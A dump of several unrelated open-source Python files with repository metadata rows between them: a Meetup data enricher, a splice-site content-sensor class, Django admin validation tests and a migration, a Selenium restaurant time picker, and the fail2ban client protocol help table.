if 'data' in item and type(item) == dict:
user = item['data'][identity_field]
identity['username'] = str(user["id"])
identity['email'] = None
identity['name'] = user["name"]
return identity
def get_project_repository(self, eitem):
return eitem['tag']
@metadata
def get_rich_item(self, item):
# We need to detect the category of item: activities (report), events or users
eitem = {}
if 'time' not in item['data']:
logger.warning("[meetup] Not processing %s: no time field", item['uuid'])
return eitem
for f in self.RAW_FIELDS_COPY:
if f in item:
eitem[f] = item[f]
else:
eitem[f] = None
event = item['data']
# data fields to copy
copy_fields = ["id", "how_to_find_us"]
for f in copy_fields:
if f in event:
eitem[f] = event[f]
else:
eitem[f] = None
# Fields which names are translated
map_fields = {
"link": "url",
"rsvp_limit": "rsvps_limit"
}
for fn in map_fields:
if fn in event:
eitem[map_fields[fn]] = event[fn]
else:
                eitem[map_fields[fn]] = None
# event host fields: author of the event
if 'event_hosts' in event:
host = event['event_hosts'][0]
if 'photo' in host:
eitem['member_photo_url'] = host['photo']['photo_link']
eitem['member_photo_id'] = host['photo']['id']
eitem['member_photo_type'] = host['photo']['type']
eitem['member_is_host'] = True
eitem['member_id'] = host['id']
eitem['member_name'] = host['name']
eitem['member_url'] = "https://www.meetup.com/members/" + str(host['id'])
eitem['event_url'] = event['link']
        # data fields to copy with meetup_ prefix
copy_fields = ["description", "plain_text_description",
"name", "status", "utc_offset", "visibility",
"waitlist_count", "yes_rsvp_count", "duration",
"featured", "rsvpable"]
copy_fields_time = ["time", "updated", "created"]
for f in copy_fields:
if f in event:
eitem["meetup_" + f] = event[f]
else:
                eitem["meetup_" + f] = None
for f in copy_fields_time:
if f in event:
eitem["meetup_" + f] = unixtime_to_datetime(event[f] / 1000).isoformat()
else:
                eitem["meetup_" + f] = None
rsvps = event.get('rsvps', [])
eitem['num_rsvps'] = len(rsvps)
eitem['num_comments'] = len(event['comments'])
try:
if 'time' in event:
eitem['time_date'] = unixtime_to_datetime(event['time'] / 1000).isoformat()
else:
logger.warning("time field nof found in event")
return {}
except ValueError:
logger.warning("Wrong datetime for %s: %s", eitem['url'], event['time'])
# If no datetime for the enriched item, it is useless for Kibana
return {}
if 'venue' in event:
venue = event['venue']
copy_fields = ["id", "name", "city", "state", "zip", "country",
"localized_country_name", "repinned", "address_1"]
for f in copy_fields:
if f in venue:
eitem["venue_" + f] = venue[f]
else:
                    eitem["venue_" + f] = None
eitem['venue_geolocation'] = {
"lat": event['venue']['lat'],
"lon": event['venue']['lon'],
}
if 'series' in event:
eitem['series_id'] = event['series']['id']
eitem['series_description'] = event['series']['description']
eitem['series_start_date'] = event['series']['start_date']
if 'group' in event:
group = event['group']
copy_fields = ["id", "created", "join_mode", "name", "url_name",
"who"]
for f in copy_fields:
if f in group:
eitem["group_" + f] = group[f]
else:
                    eitem["group_" + f] = None
eitem['group_geolocation'] = {
"lat": group['lat'],
"lon": group['lon'],
}
eitem['group_topics'] = []
eitem['group_topics_keys'] = []
if 'topics' in group:
group_topics = [topic['name'] for topic in group['topics']]
group_topics_keys = [topic['urlkey'] for topic in group['topics']]
eitem['group_topics'] = group_topics
eitem['group_topics_keys'] = group_topics_keys
if len(rsvps) > 0:
eitem['group_members'] = rsvps[0]['group']['members']
created = unixtime_to_datetime(event['created'] / 1000).isoformat()
eitem['type'] = "meetup"
# time_date is when the meetup will take place, the needed one in this index
# created is when the meetup entry was created and it is not the interesting date
eitem.update(self.get_grimoire_fields(eitem['time_date'], eitem['type']))
if self.sortinghat:
eitem.update(self.get_item_sh(event))
if self.prjs_map:
eitem.update(self.get_item_project(eitem))
self.add_repository_labels(eitem)
self.add_metadata_filter_raw(eitem)
return eitem
def get_item_sh(self, item):
""" Add sorting hat enrichment fields """
sh_fields = {}
# Not shared common get_item_sh because it is pretty specific
if 'member' in item:
# comment and rsvp
identity = self.get_sh_identity(item['member'])
elif 'event_hosts' in item:
# meetup event
identity = self.get_sh_identity(item['event_hosts'][0])
else:
return sh_fields
created = unixtime_to_datetime(item['created'] / 1000)
sh_fields = self.get_item_sh_fields(identity, created)
return sh_fields
def get_rich_item_comments(self, comments, eitem):
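        # Emit one enriched item per comment, cloned from the enriched event item.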
for comment in comments:
ecomment = copy.deepcopy(eitem)
created = unixtime_to_datetime(comment['created'] / 1000).isoformat()
ecomment['url'] = comment['link']
ecomment['id'] = ecomment['id'] + '_comment_' + str(comment['id'])
ecomment['comment'] = comment['comment']
ecomment['like_count'] = comment['like_count']
ecomment['type'] = 'comment'
ecomment.update(self.get_grimoire_fields(created, ecomment['type']))
ecomment.pop('is_meetup_meetup')
# event host fields: author of the event
member = comment['member']
if 'photo' in member:
ecomment['member_photo_url'] = member['photo']['photo_link']
ecomment['member_photo_id'] = member['photo']['id']
ecomment['member_photo_type'] = member['photo']['type']
if 'event_context' in member:
ecomment['member_is_host'] = member['event_context']['host']
ecomment['member_id'] = member['id']
ecomment['member_name'] = member['name']
ecomment['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
if self.sortinghat:
ecomment.update(self.get_item_sh(comment))
yield ecomment
def get_rich_item_rsvps(self, rsvps, eitem):
for rsvp in rsvps:
ersvp = copy.deepcopy(eitem)
ersvp['type'] = 'rsvp'
created = unixtime_to_datetime(rsvp['created'] / 1000).isoformat()
ersvp.update(self.get_grimoire_fields(created, ersvp['type']))
ersvp.pop('is_meetup_meetup')
# event host fields: author of the event
member = rsvp['member']
if 'photo' in member:
ersvp['member_photo_url'] = member['photo']['photo_link']
ersvp['member_photo_id'] = member['photo']['id']
ersvp['member_photo_type'] = member['photo']['type']
ersvp['member_is_host'] = member['event_context']['host']
ersvp['member_id'] = member['id']
ersvp['member_name'] = member['name']
ersvp['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['id'] = ersvp['id'] + '_rsvp_' + str(rsvp['event']['id']) + "_" + str(member['id'])
ersvp['url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['rsvps_guests'] = rsvp['guests']
ersvp['rsvps_updated'] = rsvp['updated']
ersvp['rsvps_response'] = rsvp['response']
if self.sortinghat:
ersvp.update(self.get_item_sh(rsvp))
yield ersvp
def get_field_unique_id(self):
return "id"
def enrich_items(self, ocean_backend):
items_to_enrich = []
num_items = 0
ins_items = 0
for item in ocean_backend.fetch():
eitem = self.get_rich_item(item)
if 'uuid' not in eitem:
continue
items_to_enrich.append(eitem)
if 'comments' in item['data'] and 'id' in eitem:
comments = item['data']['comments']
rich_item_comments = self.get_rich_item_comments(comments, eitem)
items_to_enrich.extend(rich_item_comments)
if 'rsvps' in item['data'] and 'id' in eitem:
rsvps = item['data']['rsvps']
rich_item_rsvps = self.get_rich_item_rsvps(rsvps, eitem)
items_to_enrich.extend(rich_item_rsvps)
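            # Flush to Elasticsearch whenever the batch reaches MAX_SIZE_BULK_ENRICHED_ITEMS items.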
if len(items_to_enrich) < MAX_SIZE_BULK_ENRICHED_ITEMS:
continue
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
items_to_enrich = []
if len(items_to_enrich) > 0:
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
if num_items != ins_items:
missing = num_items - ins_items
logger.error("%s/%s missing items for Meetup", str(missing), str(num_items))
else:
logger.info("%s items inserted for Meetup", str(num_items))
return num_items
|
gpl-3.0
| -4,369,405,093,059,499,000
| 33.660622
| 101
| 0.52545
| false
| 3.831329
| false
| false
| false
|
ratschlab/ASP
|
applications/msplicer/content_sensors.py
|
1
|
2271
|
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Written (W) 2006-2007 Soeren Sonnenburg
# Written (W) 2007 Gunnar Raetsch
# Copyright (C) 2007-2008 Fraunhofer Institute FIRST and Max-Planck-Society
#
import numpy
class content_sensors:
def __init__(self, model):
self.dict_weights_intron=numpy.array(model.dict_weights_intron, dtype=numpy.float64)
self.dict_weights_coding=numpy.array(model.dict_weights_coding, dtype=numpy.float64)
self.dicts=numpy.concatenate((self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron, self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron), axis=0)
self.dicts[0, 64:] = 0 # only order 3 info
self.dicts[1, 64:] = 0 # only order 3 info
self.dicts[2, 0:64] = 0 # only order 4 info
self.dicts[2, 320:] = 0
self.dicts[3, 0:64] = 0 # only order 4 info
self.dicts[3, 320:] = 0
self.dicts[4, 0:320] = 0 # only order 5 info
self.dicts[4, 1344:] = 0
self.dicts[5, 0:320] = 0 # only order 5 info
self.dicts[5, 1344:] = 0
self.dicts[6, 0:1344] = 0 # only order 6 info
self.dicts[7, 0:1344] = 0 # only order 6 info
self.model = model
def get_dict_weights(self):
return self.dicts.T
def initialize_content(self, dyn):
dyn.init_svm_arrays(len(self.model.word_degree), len(self.model.mod_words))
word_degree = numpy.array(self.model.word_degree, numpy.int32)
dyn.init_word_degree_array(word_degree)
mod_words = numpy.array(4**word_degree, numpy.int32)
dyn.init_num_words_array(mod_words)
cum_mod_words=numpy.zeros(len(mod_words)+1, numpy.int32)
cum_mod_words[1:] = numpy.cumsum(mod_words)
dyn.init_cum_num_words_array(cum_mod_words)
dyn.init_mod_words_array(numpy.array(self.model.mod_words, numpy.int32))
dyn.init_sign_words_array(numpy.array(self.model.sign_words, numpy.bool))
dyn.init_string_words_array(numpy.zeros(len(self.model.sign_words), numpy.int32))
assert(dyn.check_svm_arrays())
|
gpl-2.0
| -2,526,926,866,745,545,700
| 39.553571
| 246
| 0.693087
| false
| 2.821118
| false
| false
| false
|
disqus/django-old
|
tests/regressiontests/admin_validation/tests.py
|
1
|
9982
|
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.contrib import admin
from django.contrib.admin.validation import validate, validate_inline
from models import Song, Book, Album, TwoAlbumFKAndAnE, State, City
class SongForm(forms.ModelForm):
pass
class ValidFields(admin.ModelAdmin):
form = SongForm
fields = ['title']
class InvalidFields(admin.ModelAdmin):
form = SongForm
fields = ['spam']
class ValidationTestCase(TestCase):
def test_readonly_and_editable(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ["original_release"]
fieldsets = [
(None, {
"fields": ["title", "original_release"],
}),
]
validate(SongAdmin, Song)
def test_custom_modelforms_with_fields_fieldsets(self):
"""
# Regression test for #8027: custom ModelForms with fields/fieldsets
"""
validate(ValidFields, Song)
self.assertRaisesMessage(ImproperlyConfigured,
"'InvalidFields.fields' refers to field 'spam' that is missing from the form.",
validate,
InvalidFields, Song)
def test_exclude_values(self):
"""
Tests for basic validation of 'exclude' option values (#12689)
"""
class ExcludedFields1(admin.ModelAdmin):
exclude = ('foo')
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFields1.exclude' must be a list or tuple.",
validate,
ExcludedFields1, Book)
def test_exclude_duplicate_values(self):
class ExcludedFields2(admin.ModelAdmin):
exclude = ('name', 'name')
self.assertRaisesMessage(ImproperlyConfigured,
"There are duplicate field(s) in ExcludedFields2.exclude",
validate,
ExcludedFields2, Book)
def test_exclude_in_inline(self):
class ExcludedFieldsInline(admin.TabularInline):
model = Song
exclude = ('foo')
class ExcludedFieldsAlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [ExcludedFieldsInline]
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFieldsInline.exclude' must be a list or tuple.",
validate,
ExcludedFieldsAlbumAdmin, Album)
def test_exclude_inline_model_admin(self):
"""
# Regression test for #9932 - exclude in InlineModelAdmin
# should not contain the ForeignKey field used in ModelAdmin.model
"""
class SongInline(admin.StackedInline):
model = Song
exclude = ['album']
class AlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [SongInline]
self.assertRaisesMessage(ImproperlyConfigured,
"SongInline cannot exclude the field 'album' - this is the foreign key to the parent model admin_validation.Album.",
validate,
AlbumAdmin, Album)
def test_app_label_in_admin_validation(self):
"""
Regression test for #15669 - Include app label in admin validation messages
"""
class RawIdNonexistingAdmin(admin.ModelAdmin):
raw_id_fields = ('nonexisting',)
self.assertRaisesMessage(ImproperlyConfigured,
"'RawIdNonexistingAdmin.raw_id_fields' refers to field 'nonexisting' that is missing from model 'admin_validation.Album'.",
validate,
RawIdNonexistingAdmin, Album)
def test_fk_exclusion(self):
"""
Regression test for #11709 - when testing for fk excluding (when exclude is
given) make sure fk_name is honored or things blow up when there is more
than one fk to the parent model.
"""
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
exclude = ("e",)
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_inline_self_validation(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
self.assertRaisesMessage(Exception,
"<class 'regressiontests.admin_validation.models.TwoAlbumFKAndAnE'> has more than 1 ForeignKey to <class 'regressiontests.admin_validation.models.Album'>",
validate_inline,
TwoAlbumFKAndAnEInline, None, Album)
def test_inline_with_specified(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_readonly(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title",)
validate(SongAdmin, Song)
def test_readonly_on_method(self):
def my_function(obj):
pass
class SongAdmin(admin.ModelAdmin):
readonly_fields = (my_function,)
validate(SongAdmin, Song)
def test_readonly_on_modeladmin(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_modeladmin",)
def readonly_method_on_modeladmin(self, obj):
pass
validate(SongAdmin, Song)
def test_readonly_method_on_model(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_model",)
validate(SongAdmin, Song)
def test_nonexistant_field(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title", "nonexistant")
self.assertRaisesMessage(ImproperlyConfigured,
"SongAdmin.readonly_fields[1], 'nonexistant' is not a callable or an attribute of 'SongAdmin' or found in the model 'Song'.",
validate,
SongAdmin, Song)
def test_nonexistant_field_on_inline(self):
class CityInline(admin.TabularInline):
model = City
readonly_fields=['i_dont_exist'] # Missing attribute
self.assertRaisesMessage(ImproperlyConfigured,
"CityInline.readonly_fields[0], 'i_dont_exist' is not a callable or an attribute of 'CityInline' or found in the model 'City'.",
validate_inline,
CityInline, None, State)
def test_extra(self):
class SongAdmin(admin.ModelAdmin):
def awesome_song(self, instance):
if instance.title == "Born to Run":
return "Best Ever!"
return "Status unknown."
validate(SongAdmin, Song)
def test_readonly_lambda(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = (lambda obj: "test",)
validate(SongAdmin, Song)
def test_graceful_m2m_fail(self):
"""
Regression test for #12203/#12237 - Fail more gracefully when a M2M field that
specifies the 'through' option is included in the 'fields' or the 'fieldsets'
ModelAdmin options.
"""
class BookAdmin(admin.ModelAdmin):
fields = ['authors']
self.assertRaisesMessage(ImproperlyConfigured,
"'BookAdmin.fields' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
BookAdmin, Book)
def test_cannot_include_through(self):
class FieldsetBookAdmin(admin.ModelAdmin):
fieldsets = (
('Header 1', {'fields': ('name',)}),
('Header 2', {'fields': ('authors',)}),
)
self.assertRaisesMessage(ImproperlyConfigured,
"'FieldsetBookAdmin.fieldsets[1][1]['fields']' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
FieldsetBookAdmin, Book)
def test_nested_fields(self):
class NestedFieldsAdmin(admin.ModelAdmin):
fields = ('price', ('name', 'subtitle'))
validate(NestedFieldsAdmin, Book)
def test_nested_fieldsets(self):
class NestedFieldsetAdmin(admin.ModelAdmin):
fieldsets = (
('Main', {'fields': ('price', ('name', 'subtitle'))}),
)
validate(NestedFieldsetAdmin, Book)
def test_explicit_through_override(self):
"""
Regression test for #12209 -- If the explicitly provided through model
is specified as a string, the admin should still be able use
Model.m2m_field.through
"""
class AuthorsInline(admin.TabularInline):
model = Book.authors.through
class BookAdmin(admin.ModelAdmin):
inlines = [AuthorsInline]
# If the through model is still a string (and hasn't been resolved to a model)
# the validation will fail.
validate(BookAdmin, Book)
def test_non_model_fields(self):
"""
Regression for ensuring ModelAdmin.fields can contain non-model fields
that broke with r11737
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['title', 'extra_data']
validate(FieldsOnFormOnlyAdmin, Song)
def test_non_model_first_field(self):
"""
Regression for ensuring ModelAdmin.field can handle first elem being a
non-model field (test fix for UnboundLocalError introduced with r16225).
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['extra_data', 'title']
validate(FieldsOnFormOnlyAdmin, Song)
|
bsd-3-clause
| 1,530,670,665,720,559,000
| 34.523132
| 167
| 0.619415
| false
| 4.482263
| true
| false
| false
|
aestheticblasphemy/aestheticBlasphemy
|
pl_messages/migrations/0002_auto_20200828_2129.py
|
1
|
1972
|
# Generated by Django 3.1 on 2020-08-28 15:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pl_messages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='messages',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='pl_messages.messages'),
),
migrations.AlterField(
model_name='participantnotifications',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notified_participant', to=settings.AUTH_USER_MODEL, verbose_name='Notification Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='thread_participant', to=settings.AUTH_USER_MODEL, verbose_name='Thread Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='threads',
field=models.ManyToManyField(related_name='participant_threads', to='pl_messages.Thread', verbose_name='Participant Threads'),
),
migrations.AlterField(
model_name='thread',
name='last_message',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='last_message_in_thread', to='pl_messages.messages', verbose_name='Last Message'),
),
migrations.AlterField(
model_name='thread',
name='messages',
field=models.ManyToManyField(related_name='thread_messages', to='pl_messages.Messages', verbose_name='Thread Messages'),
),
]
|
gpl-3.0
| 7,672,388,963,139,680,000
| 41.869565
| 188
| 0.647566
| false
| 4.391982
| false
| false
| false
|
dmwyatt/disney.api
|
pages/timepicker.py
|
1
|
3504
|
import datetime
import logging
import os
import time
import re
import webbrowser
from dateutil import parser
from selenium import webdriver
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from selenium.webdriver.support.select import Select
from helpers import roundTime, difference_in_minutes, format_dt
from pages.helpers import wait_for
logger = logging.getLogger(__name__)
class TimeNotBookableError(Exception):
pass
class BasicTimePicker:
select_selector = 'select#diningAvailabilityForm-searchTime'
def __init__(self, browser: webdriver.PhantomJS):
self.browser = browser
@property
def select_element(self):
return self.browser.find_element_by_css_selector(self.select_selector)
@property
def select(self):
return Select(self.select_element)
@property
def option_elements(self):
return self.select_element.find_elements_by_tag_name('option')
@property
def selectable_values(self):
return [x.get_attribute('value') for x in self.option_elements]
@property
def selectable_texts(self):
return [x.text for x in self.option_elements]
def select_exact_time(self, desired_dt: datetime.datetime):
the_time = desired_dt.strftime('%H:%M')
if not the_time in self.selectable_values:
raise TimeNotBookableError("Cannot select '{}' from {}".format(the_time, self.selectable_values))
self.select.select_by_value(the_time)
def select_time_with_leeway(self, desired_dt: datetime.datetime, leeway: int):
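        # Pick the selectable time closest to desired_dt, but only accept it if
        # it lies within `leeway` minutes; otherwise raise TimeNotBookableError.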
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
if closest_delta <= leeway:
self.select_exact_time(closest)
else:
raise TimeNotBookableError("There is no selectable time that's "
"less than {} minutes from {} "
"in {}".format(leeway, format_dt(desired_dt), self.selectable_values))
def select_closest_time(self, desired_dt: datetime.datetime):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
self.select_exact_time(closest)
def select_meal(self, meal):
try:
self.select.select_by_visible_text(meal)
except NoSuchElementException:
raise TimeNotBookableError("Cannot select '{}' from {}".format(meal, self.selectable_texts))
def select_breakfast(self):
self.select_meal('Breakfast')
def select_lunch(self):
self.select_meal('Lunch')
def select_dinner(self):
self.select_meal('Dinner')
def time_to_datetime(the_time: str, reference_dt: datetime.datetime) -> datetime.datetime:
"""
Takes a string representing a time and a datetime.datetime that represents the day that time
is on, and returns a datetime.datetime on that day with the new time.
"""
dt = parser.parse(the_time)
return dt.replace(year=reference_dt.year, month=reference_dt.month, day=reference_dt.day)
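# Example with illustrative values: time_to_datetime('18:30', datetime.datetime(2016, 5, 1))
# returns datetime.datetime(2016, 5, 1, 18, 30).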
|
mit
| 4,530,609,695,152,849,400
| 27.958678
| 100
| 0.720034
| false
| 3.250464
| false
| false
| false
|
jakesyl/fail2ban
|
fail2ban/protocol.py
|
1
|
9025
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :
# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Author: Cyril Jaquier
#
__author__ = "Cyril Jaquier"
__copyright__ = "Copyright (c) 2004 Cyril Jaquier"
__license__ = "GPL"
import textwrap
##
# Describes the protocol used to communicate with the server.
protocol = [
['', "BASIC", ""],
["start", "starts the server and the jails"],
["reload", "reloads the configuration"],
["reload <JAIL>", "reloads the jail <JAIL>"],
["stop", "stops all jails and terminate the server"],
["status", "gets the current status of the server"],
["ping", "tests if the server is alive"],
["help", "return this output"],
["version", "return the server version"],
['', "LOGGING", ""],
["set loglevel <LEVEL>", "sets logging level to <LEVEL>. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG"],
["get loglevel", "gets the logging level"],
["set logtarget <TARGET>", "sets logging target to <TARGET>. Can be STDOUT, STDERR, SYSLOG or a file"],
["get logtarget", "gets logging target"],
["flushlogs", "flushes the logtarget if a file and reopens it. For log rotation."],
['', "DATABASE", ""],
["set dbfile <FILE>", "set the location of fail2ban persistent datastore. Set to \"None\" to disable"],
["get dbfile", "get the location of fail2ban persistent datastore"],
["set dbpurgeage <SECONDS>", "sets the max age in <SECONDS> that history of bans will be kept"],
["get dbpurgeage", "gets the max age in seconds that history of bans will be kept"],
['', "JAIL CONTROL", ""],
["add <JAIL> <BACKEND>", "creates <JAIL> using <BACKEND>"],
["start <JAIL>", "starts the jail <JAIL>"],
["stop <JAIL>", "stops the jail <JAIL>. The jail is removed"],
["status <JAIL> [FLAVOR]", "gets the current status of <JAIL>, with optional flavor or extended info"],
['', "JAIL CONFIGURATION", ""],
["set <JAIL> idle on|off", "sets the idle state of <JAIL>"],
["set <JAIL> addignoreip <IP>", "adds <IP> to the ignore list of <JAIL>"],
["set <JAIL> delignoreip <IP>", "removes <IP> from the ignore list of <JAIL>"],
["set <JAIL> addlogpath <FILE> ['tail']", "adds <FILE> to the monitoring list of <JAIL>, optionally starting at the 'tail' of the file (default 'head')."],
["set <JAIL> dellogpath <FILE>", "removes <FILE> from the monitoring list of <JAIL>"],
["set <JAIL> logencoding <ENCODING>", "sets the <ENCODING> of the log files for <JAIL>"],
["set <JAIL> addjournalmatch <MATCH>", "adds <MATCH> to the journal filter of <JAIL>"],
["set <JAIL> deljournalmatch <MATCH>", "removes <MATCH> from the journal filter of <JAIL>"],
["set <JAIL> addfailregex <REGEX>", "adds the regular expression <REGEX> which must match failures for <JAIL>"],
["set <JAIL> delfailregex <INDEX>", "removes the regular expression at <INDEX> for failregex"],
["set <JAIL> ignorecommand <VALUE>", "sets ignorecommand of <JAIL>"],
["set <JAIL> addignoreregex <REGEX>", "adds the regular expression <REGEX> which should match pattern to exclude for <JAIL>"],
["set <JAIL> delignoreregex <INDEX>", "removes the regular expression at <INDEX> for ignoreregex"],
["set <JAIL> findtime <TIME>", "sets the number of seconds <TIME> for which the filter will look back for <JAIL>"],
["set <JAIL> bantime <TIME>", "sets the number of seconds <TIME> a host will be banned for <JAIL>"],
["set <JAIL> datepattern <PATTERN>", "sets the <PATTERN> used to match date/times for <JAIL>"],
["set <JAIL> usedns <VALUE>", "sets the usedns mode for <JAIL>"],
["set <JAIL> banip <IP>", "manually Ban <IP> for <JAIL>"],
["set <JAIL> unbanip <IP>", "manually Unban <IP> in <JAIL>"],
["set <JAIL> maxretry <RETRY>", "sets the number of failures <RETRY> before banning the host for <JAIL>"],
["set <JAIL> maxlines <LINES>", "sets the number of <LINES> to buffer for regex search for <JAIL>"],
["set <JAIL> addaction <ACT>[ <PYTHONFILE> <JSONKWARGS>]", "adds a new action named <NAME> for <JAIL>. Optionally for a Python based action, a <PYTHONFILE> and <JSONKWARGS> can be specified, else will be a Command Action"],
["set <JAIL> delaction <ACT>", "removes the action <ACT> from <JAIL>"],
["", "COMMAND ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> actionstart <CMD>", "sets the start command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionstop <CMD>", "sets the stop command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actioncheck <CMD>", "sets the check command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionban <CMD>", "sets the ban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionunban <CMD>", "sets the unban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> timeout <TIMEOUT>", "sets <TIMEOUT> as the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> <PROPERTY> <VALUE>", "sets the <VALUE> of <PROPERTY> for the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> <METHOD>[ <JSONKWARGS>]", "calls the <METHOD> with <JSONKWARGS> for the action <ACT> for <JAIL>"],
['', "JAIL INFORMATION", ""],
["get <JAIL> logpath", "gets the list of the monitored files for <JAIL>"],
["get <JAIL> logencoding", "gets the encoding of the log files for <JAIL>"],
["get <JAIL> journalmatch", "gets the journal filter match for <JAIL>"],
["get <JAIL> ignoreip", "gets the list of ignored IP addresses for <JAIL>"],
["get <JAIL> ignorecommand", "gets ignorecommand of <JAIL>"],
["get <JAIL> failregex", "gets the list of regular expressions which matches the failures for <JAIL>"],
["get <JAIL> ignoreregex", "gets the list of regular expressions which matches patterns to ignore for <JAIL>"],
["get <JAIL> findtime", "gets the time for which the filter will look back for failures for <JAIL>"],
["get <JAIL> bantime", "gets the time a host is banned for <JAIL>"],
["get <JAIL> datepattern", "gets the patern used to match date/times for <JAIL>"],
["get <JAIL> usedns", "gets the usedns setting for <JAIL>"],
["get <JAIL> maxretry", "gets the number of failures allowed for <JAIL>"],
["get <JAIL> maxlines", "gets the number of lines to buffer for <JAIL>"],
["get <JAIL> actions", "gets a list of actions for <JAIL>"],
["", "COMMAND ACTION INFORMATION",""],
["get <JAIL> action <ACT> actionstart", "gets the start command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionstop", "gets the stop command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actioncheck", "gets the check command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionban", "gets the ban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionunban", "gets the unban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> timeout", "gets the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION INFORMATION", ""],
["get <JAIL> actionproperties <ACT>", "gets a list of properties for the action <ACT> for <JAIL>"],
["get <JAIL> actionmethods <ACT>", "gets a list of methods for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> <PROPERTY>", "gets the value of <PROPERTY> for the action <ACT> for <JAIL>"],
]
##
# Prints the protocol in a "man" format. This is used for the
# "-h" output of fail2ban-client.
def printFormatted():
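    # Print each command name indented by INDENT columns and wrap its
    # description into a WIDTH-character column starting MARGIN columns later.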
INDENT=4
MARGIN=41
WIDTH=34
firstHeading = False
for m in protocol:
if m[0] == '' and firstHeading:
print
firstHeading = True
first = True
if len(m[0]) >= MARGIN:
m[1] = ' ' * WIDTH + m[1]
for n in textwrap.wrap(m[1], WIDTH, drop_whitespace=False):
if first:
line = ' ' * INDENT + m[0] + ' ' * (MARGIN - len(m[0])) + n.strip()
first = False
else:
